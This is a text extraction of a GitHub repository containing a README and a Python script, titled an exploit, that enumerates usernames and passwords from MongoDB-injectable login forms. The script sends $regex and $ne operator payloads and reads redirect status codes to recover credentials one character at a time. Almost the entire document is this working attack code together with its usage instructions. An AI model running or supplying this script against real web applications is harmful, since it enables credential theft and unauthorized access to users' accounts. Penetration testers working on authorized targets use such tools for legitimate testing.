Full Code of an0nlk/Nosql-MongoDB-injection-username-password-enumeration for AI

master 1b3713ab2221 cached
2 files
5.2 KB
1.6k tokens
1 symbols
1 requests
Download .txt 
Repository: an0nlk/Nosql-MongoDB-injection-username-password-enumeration
Branch: master
Commit: 1b3713ab2221
Files: 2
Total size: 5.2 KB

Directory structure:
gitextract_240q6mjc/

├── README.md
└── nosqli-user-pass-enum.py

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# Nosql injection username and password enumeration script
Using this script, we can enumerate Usernames and passwords of Nosql(mongodb) injecion vulnerable web applications.
<br /><br />
Exploit Title: Nosql injection username/password enumeration.<br />
Author: Kalana Sankalpa (Anon LK).<br />
Website: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/<br />

## How to run 

### Usage

```
nosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-sc character] [-m Method]
```

### Example

```
python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit
```

### Arguments

| Arguments        | Description           |
| ------------- |:-------------:|
| -h, --h      | show this help message and exit |
| -u URL      | Form submission url. Eg: http://example.com/index.php      |
| -up parameter | Parameter name of the username. Eg: username, user      |
| -pp parameter | Parameter name of the password. Eg: password, pass      |
| -op parameters | Other paramters with the values. Separate each parameter with a comma(,). <br />Eg: login:Login, submit:Submit      |
| -ep parameter | Parameter that need to enumarate. Eg: username, password      |
| -m Method | Method of the form. Eg: GET/POST      |

![alt test](screenshots/usage.png)

![alt test](screenshots/run.jpg)

![alt test](screenshots/result.png)


================================================
FILE: nosqli-user-pass-enum.py
================================================
# Exploit Title: Nosql injection username/password enumeration
# Author: Kalana Sankalpa (Anon LK)
# Websites: https://www.widane.com, https://blogofkalana.wordpress.com
# Blogpost: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/

#!/usr/bin/python
import string
import requests
import argparse
import sys
from colorama import Fore

parser = argparse.ArgumentParser()
parser.add_argument("-u", action='store', metavar="URL", help="Form submission url. Eg: http://example.com/index.php")
parser.add_argument("-up", action='store', metavar="parameter", help="Parameter name of the username. Eg: username, user")
parser.add_argument("-pp", action='store', metavar="parameter", help="Parameter name of the password. Eg: password, pass")
parser.add_argument("-op", action='store', metavar="parameters", help="Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit")
parser.add_argument("-ep", action='store', metavar="parameter", help="Parameter that need to enumerate. Eg: username, password")
parser.add_argument("-m", action='store', metavar="Method", help="Method of the form. Eg: GET/POST")
args = parser.parse_args()

if len(sys.argv) == 1:
	print(parser.print_help(sys.stderr))
	print(Fore.YELLOW + "\nExample: python " + sys.argv[0] + " -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST")
	exit(0)
if args.u:
	url = args.u
else:
	print(Fore.RED + "Error: please enter URL with -u. ")
	exit(0)

if args.up:
	userpara = args.up
else:
	print(Fore.RED + "Error: please enter User Parameter with -up.")
	exit(0)

if args.pp:
	passpara = args.pp
else:
	print("Error: Fore.RED + please enter Password Parameter with -pp.")
	exit(0)

if args.ep:
	if args.ep == args.up:
		para1 = userpara
		para2 = passpara
	elif args.ep == args.pp:
		para1 = passpara
		para2 = userpara
	else:
		print(Fore.RED + "Error: please enter the valid parameter that need to enumarate")
		exit(0)
else:
	print(Fore.RED + "Error: please enter the Parameter that need to enumerate with -ep.")
	exit(0)

if args.op:
	otherpara = "," + args.op
else:
	otherpara = ""

if args.m is None:
	print(Fore.RED + "Warning: No method given. Using POST as the method. (You can give the method with -m)")
	
def method(url, para):
	if args.m:
		if args.m[0] == "p" or args.m[0] == "P":
			return requests.post(url, data=para, allow_redirects=False)
		elif args.m[0] == "g" or args.m[0] == "G":
			return requests.get(url, params=para, allow_redirects=False)
		else:
			print(Fore.RED + "Error: Invalid method")
			exit(0)
	else:
		return requests.post(url, data=para, allow_redirects=False)

characters = string.printable
for ch in string.printable:
	
	if ch in "$^&*|.+\?":
		characters = characters.replace(ch, '')
loop = True
finalout = ""
count = 0

for firstChar in characters:
	para = {para1 + '[$regex]' : "^" + firstChar + ".*", para2 + '[$ne]' : '1' + otherpara}
	r = method(url, para)
	if r.status_code != 302:
			print(Fore.MAGENTA + "No pattern starts with '" + firstChar + "'")
			continue;

	loop = True
	print(Fore.GREEN + "Pattern found that starts with '" + firstChar + "'")
	userpass = firstChar
	while loop:
		loop = False

		for char in characters:
			payload = userpass + char
			para = {para1 + '[$regex]' : "^" + payload + ".*", para2 + '[$ne]' : '1' + otherpara}
			r = method(url, para)
	
			if r.status_code == 302:
				print(Fore.YELLOW + "Pattern found: " + payload)
				userpass = payload
				loop = True

	print(Fore.GREEN + para1 + " found: "  + userpass)
	finalout +=  userpass + "\n"
	count += 1;

if finalout != "":
	print("\n" + str(count) + " " + para1 + "(s) found:")
	print(Fore.RED + finalout)
else:
	print(Fore.RED + "No " + para1 + " found")
Download .txt 
gitextract_240q6mjc/

├── README.md
└── nosqli-user-pass-enum.py
Download .txt 
SYMBOL INDEX (1 symbols across 1 files)

FILE: nosqli-user-pass-enum.py
  function method (line 66) | def method(url, para):
Download .json
Condensed preview — 2 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (6K chars). 
[
  {
    "path": "README.md",
    "chars": 1487,
    "preview": "# Nosql injection username and password enumeration script\nUsing this script, we can enumerate Usernames and passwords o"
  },
  {
    "path": "nosqli-user-pass-enum.py",
    "chars": 3800,
    "preview": "# Exploit Title: Nosql injection username/password enumeration\n# Author: Kalana Sankalpa (Anon LK)\n# Websites: https://w"
  }
]

About this extraction

This page contains the full source code of the an0nlk/Nosql-MongoDB-injection-username-password-enumeration GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 2 files (5.2 KB), approximately 1.6k tokens, and a symbol index with 1 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Extract another repo
Copied to clipboard!